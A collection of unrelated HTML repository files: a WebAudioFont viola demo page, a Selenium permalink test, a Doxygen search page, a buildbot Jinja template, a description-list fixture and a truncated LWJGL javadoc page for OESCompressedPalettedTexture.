<script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/js/materialize.min.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/list.js/1.1.1/list.min.js"></script> <script> $(document).ready(function(){ // the "href" attribute of .modal-trigger must specify the modal ID that wants to be triggered $('.modal-trigger').leanModal(); }); </script> </body> </html>
ThaDafinser/UserAgentParserComparison
v4/user-agent-detail/e6/ea/e6eaf7e7-11e5-4133-96e9-37b82f74ebf9.html
HTML
mit
46,902
<html> <head> <script src='https://surikov.github.io/webaudiofont/npm/dist/WebAudioFontPlayer.js'></script> <script src='0410_Aspirin_sf2_file.js'></script> <script> var selectedPreset=_tone_0410_Aspirin_sf2_file; var AudioContextFunc = window.AudioContext || window.webkitAudioContext; var audioContext = new AudioContextFunc(); var player=new WebAudioFontPlayer(); player.adjustPreset(audioContext,selectedPreset); function startWaveTableNow(pitch) { var audioBufferSourceNode = player.queueWaveTable(audioContext, audioContext.destination, selectedPreset, audioContext.currentTime + 0, pitch, 0.4); var audioBufferSourceNode = player.queueWaveTable(audioContext, audioContext.destination, selectedPreset, audioContext.currentTime + 0.4, pitch, 0.2); var audioBufferSourceNode = player.queueWaveTable(audioContext, audioContext.destination, selectedPreset, audioContext.currentTime + 0.6, pitch, 0.2); var audioBufferSourceNode = player.queueWaveTable(audioContext, audioContext.destination, selectedPreset, audioContext.currentTime + 0.8, pitch, 4); } </script> </head> <body> <p>file: 0410_Aspirin_sf2_file.js<br/> variable: _tone_0410_Aspirin_sf2_file<br/> MIDI: 41. Viola: Strings</p> <p><a href='javascript:player.cancelQueue(audioContext);'>stop</a></p> <p>chords: <a href='javascript:startWaveTableNow(4+12*4+0); startWaveTableNow(9+12*4+0); startWaveTableNow(2+12*5+2); startWaveTableNow(7+12*5+2); startWaveTableNow(11+12*5+1); startWaveTableNow(4+12*6+0);'>Am</a> | <a href='javascript:startWaveTableNow(4+12*4+0); startWaveTableNow(9+12*4+3); startWaveTableNow(2+12*5+2); startWaveTableNow(7+12*5+0); startWaveTableNow(11+12*5+1); startWaveTableNow(4+12*6+0);'>C</a> | <a href='javascript:startWaveTableNow(4+12*4+0); startWaveTableNow(9+12*4+2); startWaveTableNow(2+12*5+2); startWaveTableNow(7+12*5+1); startWaveTableNow(11+12*5+0); startWaveTableNow(4+12*6+0);'>E</a> | <a href='javascript:startWaveTableNow(4+12*4+3); startWaveTableNow(9+12*4+2); startWaveTableNow(2+12*5+0); startWaveTableNow(7+12*5+0); startWaveTableNow(11+12*5+0); startWaveTableNow(4+12*6+3);'>G</a> </p> <p>1. <a href='javascript:startWaveTableNow(0+12*1);'>C</a> <a href='javascript:startWaveTableNow(1+12*1);'>C#</a> <a href='javascript:startWaveTableNow(2+12*1);'>D</a> <a href='javascript:startWaveTableNow(3+12*1);'>D#</a> <a href='javascript:startWaveTableNow(4+12*1);'>E</a> <a href='javascript:startWaveTableNow(5+12*1);'>F</a> <a href='javascript:startWaveTableNow(6+12*1);'>F#</a> <a href='javascript:startWaveTableNow(7+12*1);'>G</a> <a href='javascript:startWaveTableNow(8+12*1);'>G#</a> <a href='javascript:startWaveTableNow(9+12*1);'>A</a> <a href='javascript:startWaveTableNow(10+12*1);'>A#</a> <a href='javascript:startWaveTableNow(11+12*1);'>B</a> </p> <p>2. <a href='javascript:startWaveTableNow(0+12*2);'>C</a> <a href='javascript:startWaveTableNow(1+12*2);'>C#</a> <a href='javascript:startWaveTableNow(2+12*2);'>D</a> <a href='javascript:startWaveTableNow(3+12*2);'>D#</a> <a href='javascript:startWaveTableNow(4+12*2);'>E</a> <a href='javascript:startWaveTableNow(5+12*2);'>F</a> <a href='javascript:startWaveTableNow(6+12*2);'>F#</a> <a href='javascript:startWaveTableNow(7+12*2);'>G</a> <a href='javascript:startWaveTableNow(8+12*2);'>G#</a> <a href='javascript:startWaveTableNow(9+12*2);'>A</a> <a href='javascript:startWaveTableNow(10+12*2);'>A#</a> <a href='javascript:startWaveTableNow(11+12*2);'>B</a> </p> <p>3. <a href='javascript:startWaveTableNow(0+12*3);'>C</a> <a href='javascript:startWaveTableNow(1+12*3);'>C#</a> <a href='javascript:startWaveTableNow(2+12*3);'>D</a> <a href='javascript:startWaveTableNow(3+12*3);'>D#</a> <a href='javascript:startWaveTableNow(4+12*3);'>E</a> <a href='javascript:startWaveTableNow(5+12*3);'>F</a> <a href='javascript:startWaveTableNow(6+12*3);'>F#</a> <a href='javascript:startWaveTableNow(7+12*3);'>G</a> <a href='javascript:startWaveTableNow(8+12*3);'>G#</a> <a href='javascript:startWaveTableNow(9+12*3);'>A</a> <a href='javascript:startWaveTableNow(10+12*3);'>A#</a> <a href='javascript:startWaveTableNow(11+12*3);'>B</a> </p> <p>4. <a href='javascript:startWaveTableNow(0+12*4);'>C</a> <a href='javascript:startWaveTableNow(1+12*4);'>C#</a> <a href='javascript:startWaveTableNow(2+12*4);'>D</a> <a href='javascript:startWaveTableNow(3+12*4);'>D#</a> <a href='javascript:startWaveTableNow(4+12*4);'>E</a> <a href='javascript:startWaveTableNow(5+12*4);'>F</a> <a href='javascript:startWaveTableNow(6+12*4);'>F#</a> <a href='javascript:startWaveTableNow(7+12*4);'>G</a> <a href='javascript:startWaveTableNow(8+12*4);'>G#</a> <a href='javascript:startWaveTableNow(9+12*4);'>A</a> <a href='javascript:startWaveTableNow(10+12*4);'>A#</a> <a href='javascript:startWaveTableNow(11+12*4);'>B</a> </p> <p>5. <a href='javascript:startWaveTableNow(0+12*5);'>C</a> <a href='javascript:startWaveTableNow(1+12*5);'>C#</a> <a href='javascript:startWaveTableNow(2+12*5);'>D</a> <a href='javascript:startWaveTableNow(3+12*5);'>D#</a> <a href='javascript:startWaveTableNow(4+12*5);'>E</a> <a href='javascript:startWaveTableNow(5+12*5);'>F</a> <a href='javascript:startWaveTableNow(6+12*5);'>F#</a> <a href='javascript:startWaveTableNow(7+12*5);'>G</a> <a href='javascript:startWaveTableNow(8+12*5);'>G#</a> <a href='javascript:startWaveTableNow(9+12*5);'>A</a> <a href='javascript:startWaveTableNow(10+12*5);'>A#</a> <a href='javascript:startWaveTableNow(11+12*5);'>B</a> </p> <p>6. <a href='javascript:startWaveTableNow(0+12*6);'>C</a> <a href='javascript:startWaveTableNow(1+12*6);'>C#</a> <a href='javascript:startWaveTableNow(2+12*6);'>D</a> <a href='javascript:startWaveTableNow(3+12*6);'>D#</a> <a href='javascript:startWaveTableNow(4+12*6);'>E</a> <a href='javascript:startWaveTableNow(5+12*6);'>F</a> <a href='javascript:startWaveTableNow(6+12*6);'>F#</a> <a href='javascript:startWaveTableNow(7+12*6);'>G</a> <a href='javascript:startWaveTableNow(8+12*6);'>G#</a> <a href='javascript:startWaveTableNow(9+12*6);'>A</a> <a href='javascript:startWaveTableNow(10+12*6);'>A#</a> <a href='javascript:startWaveTableNow(11+12*6);'>B</a> </p> <p>7. <a href='javascript:startWaveTableNow(0+12*7);'>C</a> <a href='javascript:startWaveTableNow(1+12*7);'>C#</a> <a href='javascript:startWaveTableNow(2+12*7);'>D</a> <a href='javascript:startWaveTableNow(3+12*7);'>D#</a> <a href='javascript:startWaveTableNow(4+12*7);'>E</a> <a href='javascript:startWaveTableNow(5+12*7);'>F</a> <a href='javascript:startWaveTableNow(6+12*7);'>F#</a> <a href='javascript:startWaveTableNow(7+12*7);'>G</a> <a href='javascript:startWaveTableNow(8+12*7);'>G#</a> <a href='javascript:startWaveTableNow(9+12*7);'>A</a> <a href='javascript:startWaveTableNow(10+12*7);'>A#</a> <a href='javascript:startWaveTableNow(11+12*7);'>B</a> </p> <p>8. <a href='javascript:startWaveTableNow(0+12*8);'>C</a> <a href='javascript:startWaveTableNow(1+12*8);'>C#</a> <a href='javascript:startWaveTableNow(2+12*8);'>D</a> <a href='javascript:startWaveTableNow(3+12*8);'>D#</a> <a href='javascript:startWaveTableNow(4+12*8);'>E</a> <a href='javascript:startWaveTableNow(5+12*8);'>F</a> <a href='javascript:startWaveTableNow(6+12*8);'>F#</a> <a href='javascript:startWaveTableNow(7+12*8);'>G</a> <a href='javascript:startWaveTableNow(8+12*8);'>G#</a> <a href='javascript:startWaveTableNow(9+12*8);'>A</a> <a href='javascript:startWaveTableNow(10+12*8);'>A#</a> <a href='javascript:startWaveTableNow(11+12*8);'>B</a> </p> </body> </html>
surikov/webaudiofontdata
sound/0410_Aspirin_sf2_file.html
HTML
mit
7,832
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head profile="http://selenium-ide.openqa.org/profiles/test-case"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="selenium.base" href="" /> <title>Text comment permalinks</title> </head> <body> <table cellpadding="1" cellspacing="1" border="1"> <thead> <tr><td rowspan="1" colspan="3">Text comment permalinks</td></tr> </thead><tbody> <tr> <td>setTimeout</td> <td>60000</td> <td></td> </tr> <tr> <td>open</td> <td>/logout</td> <td></td> </tr> <tr> <td>open</td> <td>/pages/32?text_comment_id=127</td> <td></td> </tr> <tr> <td>waitForTextPresent</td> <td>Ninth comment</td> <td></td> </tr> <tr> <td>open</td> <td>/pages/32?text_comment_id=130</td> <td></td> </tr> <tr> <td>waitForPageToLoad</td> <td>60000</td> <td></td> </tr> <tr> <td>waitForTextPresent</td> <td>Twelfth comment</td> <td></td> </tr> <!-- tab comment --> <tr> <td>open</td> <td>/pages/32?text_comment_id=108</td> <td></td> </tr> <tr> <td>verifyTextPresent</td> <td>Sorry, the page you have requested does not exist.</td> <td></td> </tr> <!-- image comment --> <tr> <td>open</td> <td>/pages/32?text_comment_id=109</td> <td></td> </tr> <tr> <td>verifyTextPresent</td> <td>Sorry, the page you have requested does not exist.</td> <td></td> </tr> <!-- not existed comment --> <tr> <td>open</td> <td>/pages/32?text_comment_id=25200000</td> <td></td> </tr> <tr> <td>verifyTextPresent</td> <td>Sorry, the page you have requested does not exist.</td> <td></td> </tr> </tbody></table> </body> </html>
IsaacLewis/eol
spec/selenium/comment/text_comment_permalinks.html
HTML
mit
1,748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title></title> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <link rel="stylesheet" type="text/css" href="search.css"/> <script type="text/javascript" src="search.js"></script> </head> <body class="SRPage"> <div id="SRIndex"> <div class="SRStatus" id="Loading">Loading...</div> <div class="SRResult" id="SR_sa_5falarm"> <div class="SREntry"> <a id="Item0" onkeydown="return searchResults.Nav(event,0)" onkeypress="return searchResults.Nav(event,0)" onkeyup="return searchResults.Nav(event,0)" class="SRSymbol" href="../radiotftp_8c.html#a5edba51aeb9384f25d7dc659db848817" target="basefrm">sa_alarm</a> <span class="SRScope">radiotftp.c</span> </div> </div> <div class="SRResult" id="SR_sa_5fio"> <div class="SREntry"> <a id="Item1" onkeydown="return searchResults.Nav(event,1)" onkeypress="return searchResults.Nav(event,1)" onkeyup="return searchResults.Nav(event,1)" class="SRSymbol" href="../radiotftp_8c.html#abbbcf4205db563bd9d8e3637acc82c38" target="basefrm">sa_io</a> <span class="SRScope">radiotftp.c</span> </div> </div> <div class="SRResult" id="SR_serialportfd"> <div class="SREntry"> <a id="Item2" onkeydown="return searchResults.Nav(event,2)" onkeypress="return searchResults.Nav(event,2)" onkeyup="return searchResults.Nav(event,2)" class="SRSymbol" href="../radiotftp_8c.html#ad5d8ff630186cb56cbc4b9cb931a5002" target="basefrm">serialportFd</a> <span class="SRScope">radiotftp.c</span> </div> </div> <div class="SRResult" id="SR_signalcount"> <div class="SREntry"> <a id="Item3" onkeydown="return searchResults.Nav(event,3)" onkeypress="return searchResults.Nav(event,3)" onkeyup="return searchResults.Nav(event,3)" class="SRSymbol" href="../radiotftp_8c.html#a990cc2e56a8f075b041b75a912823e94" target="basefrm">signalCount</a> <span class="SRScope">radiotftp.c</span> </div> </div> <div class="SRResult" id="SR_src"> <div class="SREntry"> <a id="Item4" onkeydown="return searchResults.Nav(event,4)" onkeypress="return searchResults.Nav(event,4)" onkeyup="return searchResults.Nav(event,4)" class="SRSymbol" href="../structmessage__t.html#ac8f22051bbe97a235c19698e9705c362" target="basefrm">src</a> <span class="SRScope">message_t</span> </div> </div> <div class="SRResult" id="SR_src_5fport"> <div class="SREntry"> <a id="Item5" onkeydown="return searchResults.Nav(event,5)" onkeypress="return searchResults.Nav(event,5)" onkeyup="return searchResults.Nav(event,5)" class="SRSymbol" href="../structmessage__t.html#ae11b6a0645157c8c75790f7c541fcaed" target="basefrm">src_port</a> <span class="SRScope">message_t</span> </div> </div> <div class="SRResult" id="SR_syncword"> <div class="SREntry"> <a id="Item6" onkeydown="return searchResults.Nav(event,6)" onkeypress="return searchResults.Nav(event,6)" onkeyup="return searchResults.Nav(event,6)" class="SRSymbol" href="../radiotftp_8c.html#a96d3c0f4106cb573e5ef72eb3fabc438" target="basefrm">syncword</a> <span class="SRScope">radiotftp.c</span> </div> </div> <div class="SRStatus" id="Searching">Searching...</div> <div class="SRStatus" id="NoMatches">No Matches</div> <script type="text/javascript"><!-- document.getElementById("Loading").style.display="none"; document.getElementById("NoMatches").style.display="none"; var searchResults = new SearchResults("searchResults"); searchResults.Search(); --></script> </div> </body> </html>
alpsayin/radiotftp
doc/html/search/variables_73.html
HTML
mit
3,503
{% extends 'base.html' %} {% block title %}Grow Buildbot{% endblock %} {% block body %} <h2>Recent builds</h2> <ul> {% for build in builds %} <li> <a href="{{ url_for('build', build_id=build.id)}}">build {{ build.id }}</a>: <strong class="status-{{ build.status }}">{{ build.status }}</strong> {{ build.git_url }} {{ build.ref }} {{ build.commit_sha }} </li> {% endfor %} <li><a href="{{ url_for('builds')}}">More &raquo;</a></li> </ul> <h2> Jobs ({{ jobs|length }}) [<a href="{{ url_for('sync_jobs') }}">sync jobs</a>] [<a href="{{ url_for('sync_forks') }}">sync forks</a>] </h2> {% for job in jobs %} <ul> <li> Job {{ job.id }}: {{ job.git_url }} (remote: {{ job.remote }}) [<a href="{{ url_for('sync_job', job_id=job.id) }}">sync job</a>] [<a href="{{ url_for('sync_fork', job_id=job.id) }}">sync fork</a>] </li> <ul> {% for ref in job.ref_map %} <li> [<a href="{{ url_for('run_job', job_id=job.id, ref=ref, commit_sha=job.ref_map[ref]['sha']) }}">build now</a>] [<a href="{{ url_for('job_browse_ref', job_id=job.id, ref=ref) }}">browse</a>] {{ ref }} ({{ job.ref_map[ref]['sha'][0:7] }}) </li> {% endfor %} </ul> </ul> {% endfor %} {% endblock %}
grow/buildbot
app/templates/index.html
HTML
mit
1,380
<!doctype html> <html> <head></head> <body> <!-- Multiple terms, single description --> <dl> <dt>Firefox</dt> <dt>Mozilla Firefox</dt> <dt>Fx</dt> <dd> A free, open source, cross-platform, graphical web browser developed by the Mozilla Corporation and hundreds of volunteers. </dd> </dl> </body> </html>
karnov/htmltoword
spec/fixtures/description_lists/test02.html
HTML
mit
330
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_14) on Sun Nov 04 20:19:08 CET 2012 --> <TITLE> OESCompressedPalettedTexture (LWJGL API) </TITLE> <META NAME="date" CONTENT="2012-11-04"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="OESCompressedPalettedTexture (LWJGL API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/OESCompressedPalettedTexture.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../org/lwjgl/opengles/OESCompressedETC1RGB8Texture.html" title="class in org.lwjgl.opengles"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../org/lwjgl/opengles/OESDepth24.html" title="class in org.lwjgl.opengles"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?org/lwjgl/opengles/OESCompressedPalettedTexture.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="OESCompressedPalettedTexture.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;<A HREF="#field_summary">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;<A HREF="#methods_inherited_from_class_java.lang.Object">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;<A HREF="#field_detail">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;METHOD</FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <!-- ======== START OF CLASS DATA ======== --> <H2> <FONT SIZE="-1"> org.lwjgl.opengles</FONT> <BR> Class OESCompressedPalettedTexture</H2> <PRE> java.lang.Object <IMG SRC="../../../resources/inherit.gif" ALT="extended by "><B>org.lwjgl.opengles.OESCompressedPalettedTexture</B> </PRE> <HR> <DL> <DT><PRE>public final class <B>OESCompressedPalettedTexture</B><DT>extends java.lang.Object</DL> </PRE> <P> <HR> <P> <!-- =========== FIELD SUMMARY =========== --> <A NAME="field_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Field Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengles/OESCompressedPalettedTexture.html#GL_PALETTE4_R5_G6_B5_OES">GL_PALETTE4_R5_G6_B5_OES</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengles/OESCompressedPalettedTexture.html#GL_PALETTE4_RGB5_A1_OES">GL_PALETTE4_RGB5_A1_OES</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengles/OESCompressedPalettedTexture.html#GL_PALETTE4_RGB8_OES">GL_PALETTE4_RGB8_OES</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengles/OESCompressedPalettedTexture.html#GL_PALETTE4_RGBA4_OES">GL_PALETTE4_RGBA4_OES</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengles/OESCompressedPalettedTexture.html#GL_PALETTE4_RGBA8_OES">GL_PALETTE4_RGBA8_OES</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengles/OESCompressedPalettedTexture.html#GL_PALETTE8_R5_G6_B5_OES">GL_PALETTE8_R5_G6_B5_OES</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengles/OESCompressedPalettedTexture.html#GL_PALETTE8_RGB5_A1_OES">GL_PALETTE8_RGB5_A1_OES</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengles/OESCompressedPalettedTexture.html#GL_PALETTE8_RGB8_OES">GL_PALETTE8_RGB8_OES</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengles/OESCompressedPalettedTexture.html#GL_PALETTE8_RGBA4_OES">GL_PALETTE8_RGBA4_OES</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengles/OESCompressedPalettedTexture.html#GL_PALETTE8_RGBA8_OES">GL_PALETTE8_RGBA8_OES</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D</TD> </TR> </TABLE> &nbsp; <!-- ========== METHOD SUMMARY =========== --> <A NAME="method_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Method Summary</B></FONT></TH> </TR> </TABLE> &nbsp;<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD> </TR> </TABLE> &nbsp; <P> <!-- ============ FIELD DETAIL =========== --> <A NAME="field_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Field Detail</B></FONT></TH> </TR> </TABLE> <A NAME="GL_PALETTE4_RGB8_OES"><!-- --></A><H3> GL_PALETTE4_RGB8_OES</H3> <PRE> public static final int <B>GL_PALETTE4_RGB8_OES</B></PRE> <DL> <DD>Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D <P> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengles.OESCompressedPalettedTexture.GL_PALETTE4_RGB8_OES">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PALETTE4_RGBA8_OES"><!-- --></A><H3> GL_PALETTE4_RGBA8_OES</H3> <PRE> public static final int <B>GL_PALETTE4_RGBA8_OES</B></PRE> <DL> <DD>Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D <P> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengles.OESCompressedPalettedTexture.GL_PALETTE4_RGBA8_OES">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PALETTE4_R5_G6_B5_OES"><!-- --></A><H3> GL_PALETTE4_R5_G6_B5_OES</H3> <PRE> public static final int <B>GL_PALETTE4_R5_G6_B5_OES</B></PRE> <DL> <DD>Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D <P> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengles.OESCompressedPalettedTexture.GL_PALETTE4_R5_G6_B5_OES">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PALETTE4_RGBA4_OES"><!-- --></A><H3> GL_PALETTE4_RGBA4_OES</H3> <PRE> public static final int <B>GL_PALETTE4_RGBA4_OES</B></PRE> <DL> <DD>Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D <P> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengles.OESCompressedPalettedTexture.GL_PALETTE4_RGBA4_OES">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PALETTE4_RGB5_A1_OES"><!-- --></A><H3> GL_PALETTE4_RGB5_A1_OES</H3> <PRE> public static final int <B>GL_PALETTE4_RGB5_A1_OES</B></PRE> <DL> <DD>Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D <P> <DL> <DT><B>See Also:</B><DD><A 